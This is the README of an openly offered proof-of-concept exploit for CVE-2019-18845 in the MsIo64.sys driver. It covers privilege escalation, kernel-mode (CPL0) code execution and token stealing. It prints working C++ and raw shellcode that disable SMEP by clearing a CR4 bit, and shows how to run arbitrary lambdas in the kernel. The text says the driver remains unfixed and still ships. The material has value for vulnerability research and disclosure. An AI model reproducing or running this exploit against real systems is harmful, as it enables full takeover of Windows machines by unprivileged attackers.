MsIoExploit

Exploit MsIo vulnerable driver

Description

This is a PoC for CVE-2019-18845 MsIo64.sys allowing non-privileged user to map/unmap arbitrary physical memory via ZwMapViewOfSection / ZwUnmapViweOfSection. If you are interested in abusing physical memory mapping, see project anycall has full implementation of client and driver-sided functionalities.

Allowing non-privileged(non-kernel) component to map arbitrary physical memory is the most bad practice and critically vulnerable way which allowing attacker to gain full control of the system as I demonstrated arbitrary NT-Kernel API invocation in this PoC.

You can try by yourself by executing this while you have driver running.

Also this driver and MsIo64.dll are fully copy & paste of IO-Memory.

This exploit was first reported 2019 but still remains unfixed and hardware vendors like ASRock still use this driver.

Features

• Privilege Escalation
• Shellcode Execution
• Arbitrary code execution in CPL0 context
  • __writemsr, __cpuid or whatever

I've implemented a replicate of Capcom exploit so you can execute any code in CPL0 context, as follows:

unsigned long long cr4 = 0;
static auto ntoskrnl_image_base = this->ntoskrnl_image_base;
static uint16_t dos_signature = 0x0;

this->disable_smep(&cr4);
// lambda will be called in the CPL0
this->exec_in_kernel([]() -> void
    {
        // direct access to the kernel virtual memory
        dos_signature = *(uint16_t*)(ntoskrnl_image_base);
    });
this->enable_smep(&cr4);

Please note that the lambda function cannot be captured because captured lambda functions cannot be a function pointer. so only static members can access from inside of the lambda. also in the context of CPL0 it is impossible to call a few specific functions like printf will cause BSOD of course.

Shellcode execution will be look like:

void exploit::disable_smep(unsigned long long* old_cr4)
{
    static uint8_t disable_smep_shellcode[] = {
        0xFA,                               // cli
        0x0F, 0x20, 0xE0,                   // mov rax, cr4
        0x48, 0x89, 0x01,                   // mov QWORD PTR [rcx], rax
        0x48, 0x25, 0xFF, 0xFF, 0xEF, 0xFF, // and rax, 0xffffffffffefffff
        0x0F, 0x22, 0xE0,                   // mov cr4, rax
        0xC3 };                             // ret

    this->execute_shellcode_in_kernel<fn_disable_smep_t>(
        reinterpret_cast<uint8_t*>(&disable_smep_shellcode),
        sizeof(disable_smep_shellcode),
        old_cr4);
}

Now we have a full control out of the system, no need to do dumbass thing like mapping unsigned drivers.

Usage

> MsIoExploit.exe

Credit

Several sources regarding token steal are from ExploitCapcom

Credit @tandasat

License

MIT copyright Kento Oki <hrn832@protonmail.com>